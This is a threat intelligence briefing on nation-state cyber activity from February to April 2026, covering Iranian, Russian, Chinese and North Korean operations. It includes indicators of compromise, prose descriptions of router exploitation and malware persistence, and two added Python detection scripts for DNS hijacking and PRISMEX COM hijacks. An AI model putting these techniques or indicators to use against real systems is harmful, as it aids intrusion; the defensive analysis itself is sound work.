CYBER THREAT INTELLIGENCE BRIEFING
Nation-State Threat Landscape Assessment Reporting Period: February 24 – April 10, 2026
PART 1: EXECUTIVE SUMMARY
1.1 Key Judgments
The following key judgments represent the highest-confidence, highest-impact findings across the full reporting period, with emphasis on developments from the April 3–10 delta window. All judgments are derived from open-source intelligence and assessed using ICD-203 analytical standards.
• The April 6 Hormuz deadline passed without a deal. Pakistan brokered a fragile two-week ceasefire on April 7–8, but Iran re-closed the Strait of Hormuz on April 8 citing Israeli strikes in Lebanon under Operation Eternal Darkness. The Strait remains effectively closed with approximately 15 ships per day transiting versus 135 pre-crisis. Over 800 tankers are stranded or waiting. The ceasefire is under immediate strain, with Iran’s parliamentary speaker declaring “time is running out” on April 9.
• A Six-Agency Joint Advisory was issued April 7 by the FBI, CISA, NSA, DOE, EPA, and U.S. Cyber Command confirming active Iranian exploitation of Rockwell Automation Allen-Bradley PLCs at U.S. water and wastewater, energy, and municipal facilities. Operational disruption at drinking water and wastewater systems was confirmed by EPA. Censys research identified 5,219 internet-exposed Rockwell PLCs globally, 74.6% in the United States.
• Operation Masquerade (April 7): An FBI-led multinational operation disrupted APT28/GRU’s FrostArmada DNS hijacking network. The campaign compromised over 18,000 unique IPs across 120+ countries and 200+ organizations using CVE-2023-50224 to exploit TP-Link and MikroTik routers. Seventeen partner nations participated in the largest coordinated Russian botnet disruption since Cyclops Blink in 2022.
• The Drift Protocol $286M cryptocurrency heist was attributed to DPRK’s UNC4736/Citrine Sleet on April 5. The attack involved a six-month social engineering operation in which North Korean operatives attended cryptocurrency conferences in person, deposited over $1M in real capital, and exploited Solana’s durable nonce mechanism to drain funds in 12 minutes.
• Storm-1175 rapid zero-day ransomware: Microsoft reported on April 7 that this Chinese-speaking group moves from initial access to Medusa ransomware deployment within 24 hours, exploiting 16+ CVEs across healthcare, education, and finance sectors in the U.S., UK, and Australia.
• The FBI DCS-3000 breach investigation continues. The system, which manages court-authorized surveillance operations, was breached via a commercial ISP vendor in a pattern consistent with Salt Typhoon. China may have gained visibility into which MSS operatives the FBI was actively tracking, with counterintelligence implications acute ahead of the Trump-Xi summit.
• Handala declared the cyber war “will not end with any military ceasefire.” The group temporarily paused U.S.-facing attacks following the ceasefire but pledged to continue operations against Israel and resume U.S. attacks “when conditions permit.” Cybersecurity experts predict a pivot to high-profile U.S. targets during the kinetic lull.
• BeiDou integration was publicly confirmed by Chinese Embassy science counsellor Zhang Heqing on April 8. Iran’s military transition to China’s BeiDou-3 satellite navigation eliminates U.S. ability to jam or degrade Iranian guidance systems, structurally ending U.S. GPS dominance in the Gulf theater.
• CISA faces an additional $707M FY2027 budget cut eliminating approximately 900 positions, announced April 7 — the same day as the six-agency ICS advisory. This compounds a pre-existing approximately 40% vacancy rate, reducing total CISA staffing to approximately 2,600 from a pre-2025 baseline of 3,700+.
• The Axios npm supply chain attack aftermath continues: 135 devices across approximately 12 organizations confirmed compromised. Secureworks CTU attributed the attack to NICKEL GLADSTONE. Transitive propagation through WordPress and Datadog packages confirmed, with months-long downstream assessment expected.
• Russia-Iran deep cyber collaboration: Ukrainian intelligence documented Z-Pentest Alliance and NoName057(16) coordinating with Iranian Handala on Israeli energy infrastructure attacks, including shared publication of access credentials to Israeli critical infrastructure control systems.
• Iran’s internet blackout reached Day 41 (960+ hours) on April 9 — the longest nationwide shutdown ever recorded in any country. The government has signaled this is a permanent policy shift, not a wartime measure.
1.3 Reporting Period Overview
This briefing covers the period from February 24 through April 10, 2026, encompassing the full arc of the U.S.-Israel-Iran kinetic conflict and its cyber dimensions. The period opened with Operation Epic Fury/Roaring Lion (February 28), which triggered the most active multi-actor cyber environment since Russia’s full-scale invasion of Ukraine. The reporting period closes in a post-deadline, fragile-ceasefire environment defined by confirmed ICS compromises at U.S. critical infrastructure facilities, an unprecedented six-agency joint advisory, and explicit declarations from Iranian-linked threat actors that cyber operations will continue regardless of military truces. The convergence of Russian, Chinese, North Korean, and Iranian cyber operations has deepened across every axis during this period, with confirmed military technology transfers, formalized information warfare agreements, and coordinated hacktivist operations against shared targets.
1.3a Conflict Timeline Summary
February 28, 2026: The United States and Israel launched Operation Epic Fury (U.S.) and Operation Roaring Lion (Israel), a coordinated military offensive targeting Iranian strategic leadership, IRGC and MOIS facilities, and nuclear infrastructure. Within hours, Iran’s internet connectivity collapsed to approximately 1% of pre-conflict levels as the government imposed a near-total blackout. Over 60 pro-Iranian hacktivist groups mobilized within the first 48 hours under the Electronic Operations Room coordination framework. The initial cyber response included the March 11 Stryker wiper attack—the first confirmed destructive cyber operation against a U.S. Fortune 500 company—which weaponized Microsoft Intune to erase 200,000+ devices across 79 countries without deploying traditional malware.
March 2–20, 2026: The cyber conflict expanded across all four nation-state threat actors. Russian hacktivist groups joined Iran’s cyber campaign under the #OpIsrael banner. Chinese APT operations intensified with Salt Typhoon still embedded in 200+ telecom companies globally and the BPFdoor kernel-level implants discovered deep in telecom backbone infrastructure. North Korean crypto theft operations continued at an accelerated pace. The Strait of Hormuz was effectively closed to Western-aligned shipping from February 28, triggering a global energy supply crisis with Brent crude approaching $120/barrel.
March 20–April 3, 2026: The second phase saw escalating brinksmanship over Hormuz. Trump issued multiple deadlines for Iran to reopen the Strait, each extended as diplomatic channels remained active. Pakistan emerged as the primary mediator. Iranian cyber operations continued through external cells operating via Starlink despite the domestic blackout: Handala breached FBI Director Kash Patel’s personal email on March 27 (eight days after FBI domain seizures), the IRGC expanded its declared target list to 18 U.S. technology companies, and MuddyWater maintained persistent access to U.S. banking and aviation networks. The Axios npm supply chain attack (March 31, attributed to DPRK) and FBI DCS-3000 breach disclosure (April 1–2, attributed to China) compounded the multi-actor threat picture.
April 3–10, 2026 (Current Period): The Hormuz deadline passed on April 6 without agreement. Pakistan brokered a fragile two-week ceasefire on April 7–8, hours before U.S. bombers were reportedly airborne. The ceasefire was immediately strained by Israeli strikes in Lebanon and Iran’s reimposition of Hormuz tolls. The six-agency joint advisory (April 7) confirmed active Iranian exploitation of Rockwell PLCs at U.S. water and energy facilities. Handala declared the cyber war independent of any military ceasefire. Operation Masquerade disrupted APT28’s FrostArmada DNS hijacking network across 120+ countries. The Drift Protocol $286M heist was attributed to DPRK’s UNC4736. BeiDou integration was publicly confirmed by a Chinese state official. CISA’s $707M budget cut was announced on the same day as the ICS advisory.
1.4 Analytical Confidence and Methodology
This briefing employs the Intelligence Community Directive 203 (ICD-203) framework for expressing analytical confidence. Source reliability is assessed on a four-tier scale: Tier 1 (government primary sources, formal advisories, court documents), Tier 2 (established vendor research such as Mandiant, CrowdStrike, ESET, Trend Micro, Rapid7), Tier 3 (industry media, secondary analysis), and Tier 4 (social media, unverified claims). All key judgments are supported by Tier 1 or Tier 2 sources unless otherwise noted. Hacktivist claims are tracked but assessed as largely unverified unless independently corroborated. Analytical confidence levels (High, Moderate, Low) are applied to specific attributions and assessments throughout the document.
The analytical picture across all four nation-state threat actors has converged on a shared conclusion: the February 28–April 10, 2026 period represents a structural inflection in the global cyber threat environment, not a temporary escalation. Three factors drive this assessment. First, the Iran conflict has activated dormant capabilities and created new operational partnerships (Russia-Iran cyber coordination, China-Iran BeiDou integration) that will persist beyond any ceasefire. Second, DPRK crypto theft operations have reached industrial scale ($300M+ in Q1 2026 alone) with social engineering sophistication previously reserved for human intelligence operations. Third, the U.S. defensive posture is structurally degraded: CISA’s approximately 40% vacancy rate and proposed $707M budget cut create a detection and response gap that adversaries are actively exploiting. The convergence of these factors creates what the 2026 ODNI Annual Threat Assessment characterizes as the most complex multi-actor cyber environment in U.S. history.
Confidence levels vary across assessments in this briefing. Findings supported by U.S. government formal attribution, court documents, or joint multi-agency advisories are assessed at HIGH confidence. Vendor research findings from established firms (Mandiant, CrowdStrike, ESET, Trend Micro, Rapid7, Proofpoint) are assessed at MODERATE-HIGH confidence. Hacktivist claims and unverified breach assertions are tracked for situational awareness but assessed at LOW confidence unless independently corroborated. On-chain cryptocurrency attribution by Chainalysis, Elliptic, and TRM Labs is assessed at HIGH confidence for flow analysis and MODERATE confidence for specific threat actor linkage. Geopolitical assessments draw on ISW, AEI, CSIS, Atlantic Council, and Lawfare analyses assessed at MODERATE-HIGH confidence.
PART 2: NATION-STATE THREAT ASSESSMENTS
2.1 Russia
2.1.1 Strategic Overview
Russian cyber operations during the reporting period reflect a dual-front posture: the ongoing war in Ukraine (spring offensive stalled against Ukraine’s Fortress Belt) and deepening coordination with Iran’s cyber campaign against Israel and the United States. Russia’s spring 2026 offensive began approximately March 17–21 but has failed to breach Ukraine’s Fortress Belt fortifications in Donetsk Oblast. The cyber dimension integrates with kinetic operations through APT28’s PRISMEX targeting of Ukrainian defense supply chains and NATO logistics. Simultaneously, Ukrainian intelligence documented structured Russia-Iran cyber collaboration, with Russian hacktivist groups (Z-Pentest Alliance, NoName057(16), DDoSia Project) coordinating with Iranian threat actors on Israeli energy infrastructure attacks. Russia continues providing Iran with Geran-2 drones, satellite imagery, and real-time U.S. warship positioning data. The FSB database access law took effect April 1, formalizing warrantless access to any Russian organization’s databases. Approximately 60 pro-Russian hacktivist groups remain active on the Iran front.
2.1.2 Key Developments This Period
Operation Masquerade — APT28/GRU FrostArmada DNS Hijacking Disruption (April 7)
On April 7, 2026, the FBI announced a court-authorized disruption of a global DNS hijacking network operated by APT28 (GRU Military Unit 26165). The campaign, tracked as FrostArmada by Lumen Black Lotus Labs, exploited CVE-2023-50224 in TP-Link WR841N and MikroTik routers to steal credentials and overwrite DHCP/DNS settings. At peak activity in December 2025, 18,000+ unique IPs across 120+ countries communicated with APT28 infrastructure. Over 200 organizations were breached and 5,000+ consumer devices impacted, including routers in 23+ U.S. states. The operation employed adversary-in-the-middle (AitM) attacks against TLS-encrypted connections, harvesting plaintext passwords, OAuth tokens, and email content. The FBI sent commands to compromised U.S. routers to collect forensic evidence, restore legitimate DNS settings, and revoke APT28 access. Seventeen partner nations participated, including the UK, Germany, Italy, Finland, Canada, and Ukraine.
APT28 PRISMEX Framework — Full Technical Disclosure (April 8)
Trend Micro published a comprehensive technical disclosure of APT28’s PRISMEX malware suite on April 8. Active since September 2025 with significant escalation in January 2026, PRISMEX targets Ukrainian defense ministries (40%), transportation and logistics (35%), and diplomatic entities (25%), extending to Poland rail logistics, Romanian maritime transport, and other NATO partner logistics networks. The framework exploits two CVEs: CVE-2026-21509 (Microsoft Office OLE bypass) and CVE-2026-21513 (MSHTML zero-day, CVSS 8.8). Components include PrismexSheet (Excel dropper with steganography), PrismexDrop (native dropper with COM hijacking), PrismexLoader (proxy DLL extracting payloads from PNG images), and PrismexStager (Covenant Grunt implant using Filen.io cloud C2). A wiper command deleting files under %USERPROFILE% was observed in at least one session.
UAC-0255/CYBER SERP AGEWHEEZE RAT Campaign
Between March 26 and 28, attackers impersonated CERT-UA in phishing emails directing recipients to download AGEWHEEZE, a Go-based RAT with full remote access capabilities including screenshots, keyboard/mouse emulation, file system management, and terminal command execution. The C2 server at 54.36.237.92 (OVH) used WebSocket connections on port 8443. The attack was assessed as largely unsuccessful, with only a small number of personal devices at educational institutions infected.
Russia-Iran Cyber Coordination
A Ukrainian intelligence assessment reviewed by Reuters on April 7 documented structured Russia-Iran cyber collaboration. Russian hacktivist groups (Z-Pentest Alliance, NoName057(16), DDoSia Project) coordinated with Iranian actors (Handala, Homeland Justice/UAC-0074, Karmabelow80) via Telegram. Specific coordination included simultaneous publication of Israeli energy infrastructure access credentials by Russian groups while Iranian groups issued attack warnings. Iranian groups were found using ProfitServer, a Russian VPS provider based in Chelyabinsk, for domain registration.
Additional Key Developments
• Rostelecom DDoS (April 6): A large-scale DDoS attack disrupted Russia’s state-run telecom across 30 cities affecting millions of users, coinciding with the Hormuz deadline.
• CARR Trial (April 7): Victoria Dubranova’s trial in the Cyber Army of Russia Reborn (CARR) case commenced in the Central District of California, with charges carrying a maximum 27-year sentence.
• FSB Database Access Law (April 1): Russian law granting FSB warrantless access to any organization’s databases entered force.
• FBI/CISA PSA (March 20): Formal attribution of Signal/WhatsApp account compromise campaign to Russian Intelligence Services, with thousands of accounts compromised globally.
• ESET BEARDSHELL/SLIMAGENT: Full technical disclosure of APT28 long-term Ukraine espionage using dual-cloud C2 (Icedrive and Filen.io).
• ClearSky BadPaw/MeowMeow: New Russian malware family targeting Ukraine with sophisticated anti-analysis measures.
• DOJ TA551 Sentencing (March 24): Ilya Angelov sentenced to 24 months for co-managing the TA551 botnet responsible for $14.17M in ransomware extortion.
• Sandworm/APT44 continued ICS/OT targeting of Ukrainian and European energy infrastructure.
• Midnight Blizzard RDP phishing campaign ongoing from late 2024.
2.1.2a Detailed Campaign Analysis
Operation Masquerade — Technical Deep Dive
The FrostArmada infrastructure operated through a two-cluster architecture. Cluster 1 comprised SOHO routers with DNS/DHCP settings overwritten to route victim traffic through actor-controlled VPS DNS servers, enabling adversary-in-the-middle interception. Cluster 2 consisted of a subset of servers receiving DNS queries via compromised MikroTik and TP-Link routers, forwarding to additional actor-owned servers, and facilitating direct interactive operations against Ukrainian MikroTik infrastructure. The exploitation vector leveraged CVE-2023-50224 (CVSS 6.5), an authentication bypass in TP-Link WR841N firmware that allowed credential extraction via crafted HTTP GET requests. A second crafted GET request overwrote DHCP/DNS settings, replacing legitimate resolvers with actor-controlled servers. All downstream devices including laptops, phones, and IoT devices inherited malicious DNS settings automatically. For high-value targets, the infrastructure served fraudulent DNS records mimicking legitimate services, particularly Microsoft Outlook Web Access, enabling credential harvesting at scale. The FBI executed a court-authorized technical operation from the Eastern District of Pennsylvania, sending commands to compromised U.S. routers to collect forensic evidence, reset DNS settings to legitimate ISP resolvers, and revoke the original APT28 access mechanism. The operation was led by FBI Boston SAC Ted E. Docks with coordination across 17 partner nations. Germany’s BfV had been contacting affected router operators since March 13, 2026, having identified at least 30 compromised routers in the country. Private sector contributors included Lumen Black Lotus Labs (which named the campaign FrostArmada), Microsoft Threat Intelligence, and MIT Lincoln Laboratory.
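As an added example (not code from the FBI, Lumen or this briefing), the Python below checks a host for the two effects the deep dive describes: a DHCP-assigned resolver that lies outside the ISP's expected address space, and a sensitive name such as the OWA host resolving differently through that resolver than through a trusted resolver queried out of band. The expected networks, resolver addresses and DNS answers in the demo are constructed samples; `query_a` performs a live lookup only when pointed at a real resolver.

```python
"""Added example (not FBI, Lumen or briefing tooling): two checks for a LAN hit by
FrostArmada-style DNS hijacking. 1) The DHCP-assigned resolver lies outside the
ISP's expected address space. 2) That resolver answers a sensitive name (e.g. the
OWA host) differently from a trusted resolver queried out of band.
All networks, addresses and answers in the demo are constructed samples."""
import random
import socket
import struct
from ipaddress import ip_address, ip_network

A_RECORD, CLASS_IN = 1, 1


def resolvers_from_resolv_conf(text):
    """Pull 'nameserver X' entries out of resolv.conf-style text."""
    return [line.split()[1] for line in text.splitlines()
            if line.strip().startswith("nameserver") and len(line.split()) > 1]


def rogue_resolvers(configured, expected_networks):
    """Configured resolvers that fall outside every expected (ISP/corporate) network."""
    nets = [ip_network(n) for n in expected_networks]
    return [r for r in configured if not any(ip_address(r) in n for n in nets)]


def build_query(name, txid):
    """Minimal DNS A query (one question, RD=1)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", A_RECORD, CLASS_IN)


def build_response(txid, name, addrs, ttl=60):
    """Constructed response for the offline demo (QR=1, RD=1, RA=1); not live traffic."""
    question = build_query(name, txid)[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(addrs), 0, 0)
    rrs = b""
    for a in addrs:  # each RR points back (0xC00C) at the question name
        rrs += b"\xc0\x0c" + struct.pack("!HHIH", A_RECORD, CLASS_IN, ttl, 4) + socket.inet_aton(a)
    return header + question + rrs


def _skip_name(msg, off):
    """Advance past a (possibly compressed) domain name."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # compression pointer terminates the name
            return off + 2
        off += 1 + length


def parse_a_records(msg, txid):
    """Return the set of IPv4 addresses in the answer section of a response."""
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if rid != txid or not flags & 0x8000:
        raise ValueError("not a response to our query")
    off = 12
    for _ in range(qd):
        off = _skip_name(msg, off) + 4  # skip QTYPE and QCLASS
    addrs = set()
    for _ in range(an):
        off = _skip_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == A_RECORD and rclass == CLASS_IN and rdlen == 4:
            addrs.add(socket.inet_ntoa(msg[off:off + 4]))
        off += rdlen
    return addrs


def query_a(name, resolver, timeout=2.0):
    """Live lookup of one name against one specific resolver over UDP/53."""
    txid = random.randrange(0x10000)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (resolver, 53))
        data, _ = s.recvfrom(4096)
    return parse_a_records(data, txid)


def answer_mismatches(local_answers, trusted_answers):
    """Addresses the LAN resolver returned that the trusted resolver did not."""
    return sorted(local_answers - trusted_answers)


if __name__ == "__main__":
    # Constructed scenario: the router now hands out 198.51.100.53, and that
    # resolver sends the OWA host to an actor-controlled address.
    conf = "search corp.example\nnameserver 192.0.2.1\nnameserver 198.51.100.53\n"
    print("rogue resolvers:", rogue_resolvers(resolvers_from_resolv_conf(conf), ["192.0.2.0/24"]))
    txid = 0x1234
    local = parse_a_records(build_response(txid, "owa.example.com", ["198.51.100.7"]), txid)
    trusted = parse_a_records(build_response(txid, "owa.example.com", ["203.0.113.10"]), txid)
    print("mismatched answers:", answer_mismatches(local, trusted))
    # Live: compare query_a(name, "<dhcp resolver>") with query_a(name, "<trusted resolver>")
```

Run the trusted lookup over a path the router cannot influence (for example a known resolver reached through a VPN); an answer set that differs only on the sensitive names is the OWA-mimicking pattern the deep dive describes.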
PRISMEX Framework — Component Architecture
The PRISMEX campaign represents APT28’s most technically sophisticated modular malware suite disclosed to date. PrismexSheet operates as the initial dropper using macro-enabled Excel files with custom “Bit Plane Round Robin” steganography to embed payloads within seemingly benign image files. The component performs COM hijacking on CLSID {68DDBB56-9D1D-4FD9-89C5-C0DA2A625392} for persistence, using decoy documents themed as drone inventory lists, weapon smuggling alerts, and military training invitations. PrismexDrop functions as a native dropper that decrypts payloads with rolling XOR and performs COM DLL hijacking on CLSID {D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}, establishing a scheduled task named “OneDriveHealth” to restart explorer.exe as a trusted process. PrismexLoader masquerades as EhStorShell.dll and extracts .NET payloads from PNG images using the Bit Plane Round Robin algorithm, achieving fully fileless in-memory execution through CLR bootstrapping in explorer.exe. PrismexStager implements a Covenant Grunt implant that routes C2 communications through Filen.io end-to-end encrypted cloud storage (gateway.filen.io, egest.filen.io, ingest.filen.io), blending malicious traffic with legitimate encrypted cloud traffic to bypass reputation-based filtering. The campaign targets Ukraine defense ministries (40% of targets), transportation and logistics (35%), and diplomatic entities (25%), with extension to Poland (rail logistics), Romania (maritime/transport), Slovakia, Slovenia, and Turkey.
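An added hunting script (not Trend Micro's or the briefing's own tooling) for the PRISMEX persistence mechanisms named above: the two CLSIDs registered under the per-user path `HKCU\Software\Classes\CLSID` (assumed here because a per-user entry shadows the machine-wide one, the usual COM hijacking location), any per-user COM server pointing into a user-writable directory, an `EhStorShell.dll` registered from outside System32, and the `OneDriveHealth` task. The registry and task snapshots in the demo are constructed samples; live collection runs only on Windows.

```python
"""Added example (not Trend Micro's or the briefing's own tooling): hunt for the
PRISMEX persistence mechanisms on a Windows host. Assumptions: the hijacked
CLSIDs sit under HKCU\\Software\\Classes\\CLSID (a per-user entry shadows the
machine-wide one, the usual COM hijacking location); sample snapshots are
constructed. The check functions take dicts/lists so they also run offline."""
import ntpath
import re
import subprocess

PRISMEX_CLSIDS = {  # from the report
    "{68DDBB56-9D1D-4FD9-89C5-C0DA2A625392}": "PrismexSheet COM hijack",
    "{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}": "PrismexDrop COM hijack",
}
PRISMEX_TASK = "OneDriveHealth"
MASQUERADED_DLL = "ehstorshell.dll"  # genuine copy lives in %SystemRoot%\System32
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|programdata|temp)\\", re.I)


def com_hijack_findings(hkcu_clsids):
    """hkcu_clsids: {CLSID: InprocServer32 default value} from the user hive.
    Returns (clsid, path, reason) tuples."""
    findings = []
    for clsid, path in hkcu_clsids.items():
        clsid_u = clsid.upper()
        if clsid_u in PRISMEX_CLSIDS:
            findings.append((clsid_u, path, PRISMEX_CLSIDS[clsid_u]))
        elif USER_WRITABLE.search(path):
            findings.append((clsid_u, path, "per-user COM server in user-writable path"))
        if ntpath.basename(path).lower() == MASQUERADED_DLL and "system32" not in path.lower():
            findings.append((clsid_u, path, "EhStorShell.dll loaded from outside System32"))
    return findings


def task_findings(task_names):
    """Scheduled task names matching the PRISMEX task (case-insensitive)."""
    return [t for t in task_names if t.lower() == PRISMEX_TASK.lower()]


def collect_hkcu_clsids():
    """Live collection of HKCU CLSID -> InprocServer32 on Windows; {} elsewhere."""
    try:
        import winreg
    except ImportError:
        return {}
    out = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Classes\CLSID") as root:
        i = 0
        while True:
            try:
                clsid = winreg.EnumKey(root, i)
            except OSError:
                break
            i += 1
            try:
                with winreg.OpenKey(root, clsid + r"\InprocServer32") as k:
                    out[clsid] = winreg.QueryValueEx(k, "")[0]
            except OSError:
                pass  # CLSID without an in-process server
    return out


def collect_task_names():
    """Live task names via schtasks (leaf name only); [] if schtasks is unavailable."""
    try:
        raw = subprocess.run(["schtasks", "/Query", "/FO", "CSV", "/NH"],
                             capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return []
    return [line.split(",")[0].strip('"').rsplit("\\", 1)[-1]
            for line in raw.splitlines() if line.strip()]


# Constructed snapshot standing in for a compromised user profile.
SAMPLE_HKCU = {
    "{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}": r"C:\Users\alice\AppData\Roaming\EhStorShell.dll",
    "{00000000-0000-0000-0000-000000000001}": r"C:\Windows\System32\legit.dll",
}
SAMPLE_TASKS = ["Adobe Acrobat Update Task", "OneDriveHealth"]

if __name__ == "__main__":
    hkcu = collect_hkcu_clsids() or SAMPLE_HKCU
    tasks = collect_task_names() or SAMPLE_TASKS
    for clsid, path, reason in com_hijack_findings(hkcu):
        print(f"COM  {clsid} -> {path}: {reason}")
    for t in task_findings(tasks):
        print(f"TASK {t}: matches PRISMEX scheduled task name")
```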
Signal/WhatsApp Campaign — Global Scope
The FBI/CISA joint PSA issued March 20 represents the highest-tier U.S. government confirmation of the messaging app compromise campaign. The PSA confirmed thousands of individual accounts worldwide compromised through social engineering rather than encryption bypass. Actors posed as “Signal Support” bots to steal device-linking QR codes or account verification PINs, enabling full account access including historical message content. FBI Director Kash Patel stated the campaign targets “individuals of high intelligence value, including current and former U.S. government officials, military personnel, political figures, and journalists.” France (ANSSI/C4), Netherlands (AIVD/MIVD), and Germany issued parallel warnings, establishing a four-country confirmed targeting footprint across core EU/NATO states. Prior independent attribution by Microsoft and Google GTIG linked the campaign to Star Blizzard (FSB), UNC5792/UAC-0195 (assessed GRU-linked), and UNC4221/UAC-0185 (assessed GRU-linked). The PSA warned that malware deployment may be added to the attack chain as the campaign evolves.
Russian Domestic Cyber Policy
Russia’s domestic information environment hardening accelerated during the reporting period. The FSB database access law entered force April 1, granting the FSB legal authority to obtain copies of any organization’s databases without court order. Putin signed a law on February 20 giving FSB power to order ISPs to restrict internet access without judicial authorization. The Kremlin is setting conditions to imminently tighten VPN restrictions per ISW’s April 2 assessment. These measures create a dual posture: reducing Russian military communications exposure while simultaneously conducting offensive operations abroad. The convergence of domestic internet controls with the spring 2026 kinetic offensive suggests a war-footing digital posture consistent with New Generation Warfare doctrine.
2.1.3 Tactics, Techniques, and Procedures
Russian APT TTPs during this period reflect increasing sophistication in infrastructure abuse and evasion. Key patterns include: exploitation of SOHO router firmware vulnerabilities for DNS hijacking at scale (CVE-2023-50224); dual CVE chaining for zero-day exploitation (CVE-2026-21509 + CVE-2026-21513); legitimate cloud storage abuse for C2 (Filen.io, Icedrive); steganographic payload delivery via PNG images; COM object hijacking for persistence; adversary-in-the-middle attacks against TLS-encrypted traffic; and coordinated hacktivist DDoS operations under the #OpIsrael banner. The PRISMEX framework demonstrates APT28’s evolution toward modular, fileless, cloud-native malware architecture that bypasses reputation-based filtering.
2.1.5 Assessment and Outlook
Russia’s cyber threat posture remains HIGH with an upward trajectory driven by the dual Ukraine/Iran fronts. Operation Masquerade’s disruption is tactically significant but historically GRU units reconstitute rapidly. The PRISMEX framework represents APT28’s most sophisticated modular toolset disclosed to date, with destructive wiper capability embedded alongside espionage functions. The Russia-Iran cyber axis is now documented at the coordination level, with shared infrastructure and synchronized targeting. The spring offensive’s stall may redirect Russian cyber assets toward asymmetric pressure via the Iran theater. Near-term priorities include monitoring for FrostArmada reconstitution, PRISMEX expansion to additional NATO targets, and deepening Russia-Iran hacktivist coordination during the ceasefire period.
Pro-Russian Hacktivist Group Inventory
The pro-Russian hacktivist ecosystem supporting Iranian operations represents the most geographically diverse proxy alignment in modern cyber conflict. NoName057(16) operates the DDoSia Project, a crowdsourced DDoS platform that provides subscribers with automated attack tools targeting Israeli municipal, political, telecom, and defense-related entities. The group maintains active Telegram channels for coordination and has been linked to the CISM, an IT organization established by Russian Presidential order in October 2018. Cardinal, a state-aligned hacktivist group, jointly claimed attacks on Israeli military systems including alleged Iron Dome radar and interception infrastructure breaches—claims assessed as highly exaggerated by Intel 471 and Trellix but consistent with psychological warfare objectives. Russian Legion claimed control of Iron Dome radars and interception targets in real-time, assertions assessed as highly improbable. Z-Pentest Alliance alleged full control of Israeli pump control and water supply management HMIs—consistent with prior claims patterns but unverified. Hider_Nex claimed disruption of Israeli telecommunications. RuskiNet Group claimed temporary disruption of KPMG Israel. PalachPro publicly stated intent to assist Iranian hackers. Dark Storm Team claimed DDoS against Israeli banks. Server Killers (Russian-speaking) joined the cyber war in an opportunistic capacity. Resecurity assessed the overall hacktivist activity as “uncoordinated and conducted by multiple disconnected groups” despite Kremlin messaging suggesting Russia-Iran alignment, though the April 7 Ukrainian intelligence assessment suggests greater coordination than previously assessed.
Midnight Blizzard (APT29/SVR) — Continued RDP Phishing
APT29/Midnight Blizzard/Cozy Bear, attributed to Russia’s SVR, maintained its ongoing RDP phishing campaign throughout the reporting period. Originally disclosed in late 2024, the campaign uses signed RDP configuration files sent via phishing emails to establish persistent connections to target systems. While no new campaign disclosures emerged during the April 3–10 window, the campaign from late 2024 is assessed as ongoing against government, diplomatic, and think tank targets across NATO member states. The Microsoft breach lateral movement investigation continues, with the SVR maintaining access to Microsoft’s source code repositories and corporate email systems for an extended period before discovery. APT29’s operational tempo is sustained but receives less public attention than APT28 due to the latter’s more aggressive tooling and targeting.
Sandworm/APT44 — ICS/OT and Wiper Operations
Sandworm (APT44, GRU Unit 74455) continues its ICS/OT targeting of Ukrainian and European energy infrastructure, though no new Sandworm campaigns were publicly disclosed in the April 3–10 window. The group’s most recent publicly documented operations include the ZeroLot wiper deployed against Ukrainian energy companies in 2024–2025 and the December 29, 2025 FSB Center 16 attack on 30 Polish renewable energy facilities using the Dynowiper malware (descended from Sandworm’s ZOV tool). The Barracuda Networks March 16 profile confirmed Sandworm’s operational continuity through January 2026 targeting campaigns. The BadPilot campaign (Seashell Blizzard subgroup) continues providing initial access for Sandworm operations. RUSI hosted John Hultquist (Google Threat Intelligence Chief Analyst) for a March 2026 event specifically on Russian cyber sabotage in Europe, signaling heightened analyst attention. The convergence of Sandworm’s European energy targeting with Russia’s spring offensive creates elevated risk for coordinated cyber-kinetic operations against Ukrainian logistics and Western energy infrastructure supporting Ukraine.
2.2 China
2.2.1 Strategic Overview
Chinese cyber operations during this period are characterized by an unprecedented combination of intelligence collection depth and structural strategic positioning. The FBI DCS-3000 surveillance system breach represents the most operationally significant Chinese penetration of U.S. law enforcement infrastructure ever publicly disclosed. The pre-summit espionage window ahead of the Trump-Xi Beijing meeting is active, with Salt Typhoon still embedded in 200+ companies globally. CISA’s structural degradation (40% vacancy rate plus proposed $707M FY2027 cut) creates a widening detection gap. BeiDou integration with Iran was publicly confirmed at the state level, structurally ending U.S. GPS dominance in the Gulf theater. The Trump administration halted Salt Typhoon sanctions to preserve the trade truce, effectively signaling to the MSS that telecom espionage will not generate diplomatic costs.
2.2.2 Key Developments
• FBI DCS-3000 Breach: Classified as a FISMA “major incident” on April 1. The Digital Collection System Network manages court-authorized surveillance operations. Attackers exploited commercial ISP vendor infrastructure in a pattern consistent with Salt Typhoon. Congress notified. Investigation ongoing.
• Storm-1175 Rapid Zero-Day Ransomware (April 7): Microsoft reported this Chinese-speaking group moves from initial access to Medusa ransomware deployment within 24 hours, exploiting 16+ CVEs across Ivanti, JetBrains, SimpleHelp, CrushFTP, BeyondTrust, and SmarterMail products. Targets include healthcare, education, and finance sectors.
• FlamingChina/NSCC Tianjin Breach (April 7–9): A group calling itself FlamingChina claimed theft of 10+ petabytes from China’s National Supercomputing Center in Tianjin, including defense and aerospace research data. Expert assessment: samples appear genuine. Note that this is a breach of Chinese systems, not an operation conducted by China.
• TA416/Mustang Panda resumed European and Middle East espionage (April 1): Proofpoint documented renewed targeting of EU and NATO diplomatic missions with three evolving infection chains deploying custom PlugX backdoor via DLL sideloading. Middle East expansion from March 2026.
• BPFdoor/Red Menshen: RH-ISAC published IOCs on March 31 for kernel-level Linux implants deployed deep inside telecom backbone infrastructure. Seven new variants identified with SCTP signaling and HTTPS camouflage capabilities.
